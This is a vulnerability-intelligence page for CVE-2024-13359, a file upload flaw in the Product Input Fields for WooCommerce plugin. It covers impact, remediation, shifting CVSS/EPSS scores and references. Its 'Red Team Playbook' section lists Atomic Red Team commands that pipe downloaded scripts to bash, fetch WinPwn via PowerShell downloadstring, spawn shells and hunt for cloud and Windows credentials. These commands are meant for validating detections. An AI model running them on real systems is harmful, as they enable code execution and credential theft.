CVE-2024-13359
Overview
This vulnerability is an arbitrary file upload flaw caused by insufficient validation of uploaded file types within the add_product_input_fields_to_order_item_meta() function of the Product Input Fields for WooCommerce plugin. The root cause lies in the failure to properly enforce file extension restrictions, particularly allowing double extension files, in the plugin's input handling component. This affects all plugin versions up to and including 1.12.0, impacting the file upload mechanism tied to order item metadata processing.
Vulnerability Description
The Product Input Fields for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the add_product_input_fields_to_order_item_meta() function in all versions up to, and including, 1.12.0. This may make it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Please note that by default the plugin is only vulnerable to a double extension file upload attack, unless an administrators leaves the accepted file extensions field blank which can make .php file uploads possible. Please note 1.12.2 was mistakenly marked as patched while 1.12.1 was marked as vulnerable for a short period of time, this is not the case and 1.12.1 is fully patched.
Impact
An unauthenticated attacker can exploit this vulnerability to upload arbitrary files, including potentially executable PHP scripts if the accepted file extensions field is left blank by an administrator. This can lead to remote code execution on the affected server, enabling full compromise of the WordPress site and underlying system. The attack requires no user interaction and can be performed remotely over the network (CVSS vector AV:N/AC:H/PR:N/UI:N), making it a high-severity threat with direct consequences for site integrity and data confidentiality.
Solution
To remediate this vulnerability, upgrade the Product Input Fields for WooCommerce plugin to version 1.12.1 or later, as versions 1.12.1 and above include the necessary fixes to enforce proper file type validation. The Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/a9c08f2e-bffd-40a6-89f3-559cb34f4395 provides detailed patch information. Administrators should also ensure that the accepted file extensions field is not left blank to prevent uploading of executable files.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Product Input Fields for WooCommerce plugin for WordPress stems from inadequate validation of file types during the execution of the add_product_input_fields_to_order_item_meta() function. This flaw allows for arbitrary file uploads, which can be exploited by attackers to upload malicious files to the server hosting the affected site. The core of the issue lies in the plugin's failure to properly restrict the types of files that can be uploaded, particularly when the accepted file extensions field is left blank by an administrator. Under normal circumstances, the plugin is primarily vulnerable to double extension file upload attacks, where an attacker might upload a file with a misleading extension that could bypass basic security checks.
Exploitation of this vulnerability can occur through various attack vectors. An unauthenticated attacker could leverage the arbitrary file upload capability to introduce malicious scripts or executables onto the server. For instance, if an attacker uploads a PHP file disguised as an image (e.g., image.jpg.php), they could execute arbitrary code on the server once the file is accessed. This could lead to a complete compromise of the web application, allowing the attacker to gain unauthorized access to sensitive data, manipulate site content, or even pivot to other systems within the network. The risk is exacerbated when administrators neglect to configure the plugin correctly, as leaving the accepted file extensions field blank can enable the upload of potentially harmful files without any restrictions.
The real-world impact of this vulnerability can be severe for businesses relying on the WooCommerce platform for their e-commerce operations. Successful exploitation could lead to data breaches, loss of customer trust, and significant financial repercussions. For instance, if an attacker gains access to customer data, including payment information, it could result in regulatory fines and legal liabilities, not to mention the potential for reputational damage. Furthermore, the ability to execute arbitrary code on the server could allow attackers to deploy ransomware or other forms of malware, leading to operational disruptions and additional recovery costs.
To detect and mitigate the risks associated with this vulnerability, organizations should implement several strategies. Regular security audits and vulnerability assessments can help identify misconfigurations and outdated plugins. It is crucial to keep the Product Input Fields for WooCommerce plugin updated to the latest version, as the vendor has released patches to address this vulnerability. Additionally, employing a web application firewall (WAF) can provide an additional layer of security by filtering out malicious requests before they reach the application. Administrators should also enforce strict file type validation and ensure that the accepted file extensions field is properly configured to prevent unauthorized uploads.
In conclusion, the arbitrary file upload vulnerability in the Product Input Fields for WooCommerce plugin poses a significant threat to WordPress-based e-commerce sites. The potential for remote code execution and the associated risks highlight the importance of proper security practices, including regular updates, configuration management, and proactive monitoring. By understanding the technical details, potential attack vectors, and implementing robust detection and mitigation strategies, organizations can better protect themselves against this and similar vulnerabilities in the future.
Recent updates to the CVSS scoring for CVE-2024-13359 reflect a recalibration of the vulnerability’s severity from critical to high, lowering the score from 9.8 to 8.1. This adjustment aligns with refined assessments of the exploitability and impact factors, particularly considering the default limitation to double extension file uploads which constrains the attack surface. Concurrently, CSURFACE threat intelligence has detected a modest but consistent increase in the Exploit Prediction Scoring System (EPSS) value, now at 0.0308, indicating a slight uptick in the likelihood of exploitation attempts in the wild. While no new exploit techniques or proof-of-concept code have been observed, this gradual rise in EPSS suggests growing interest or reconnaissance activity targeting this vulnerability. For defenders, this means that although the immediate risk of widespread exploitation may be somewhat reduced due to the lowered CVSS score, vigilance remains critical given the increasing probability of attack attempts. The updated risk profile underscores a nuanced threat landscape where exploitation potential is moderated by technical constraints but buoyed by emerging attacker focus, necessitating continued monitoring and adaptive defensive postures.
Update 2 — June 13, 2026
The recent adjustment of the CVSS score for CVE-2024-13359 from 8.1 to 9.8 reflects a reassessment of the vulnerability’s criticality, emphasizing its potential impact more sharply. This change is significant because it underscores the heightened risk posed by the arbitrary file upload flaw in the Product Input Fields for WooCommerce plugin, particularly given the possibility of remote code execution through double extension files. Although the EPSS score has decreased notably, indicating a reduced likelihood of immediate widespread exploitation as per our telemetry, the elevated CVSS score signals that the vulnerability remains a high-priority concern for defenders. The divergence between the CVSS and EPSS metrics suggests that while active exploitation attempts have not surged, the technical severity and exploitability potential warrant sustained vigilance. This recalibration should prompt security teams to reassess their exposure and monitoring strategies, as the critical nature of the flaw could facilitate impactful attacks if leveraged by threat actors. No new exploit developments have been detected, but the updated risk profile highlights the necessity for continued observation and preparedness against potential exploitation scenarios.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Tychesoftwares | Product Input Fields For Woocommerce | All |
cpe:2.3:a:tychesoftwares:product_input_fields_for_woocommerce:*:*:*:*:*:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
35%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-13359 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/a9c08f2e-bffd-40a6-89f3-559cb34f4395?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/product-input-fields-for-woocommerce/tags/-1.8.2/includes/class-alg-wc-pif-main.php |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3250201%40product-input-fields-for-woocommerce&new=3250201%40product-input-fields-for-woocommerce&sfp_email=&sfph_mail= |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3234567%40product-input-fields-for-woocommerce&new=3234567%40product-input-fields-for-woocommerce&sfp_email=&sfph_mail= |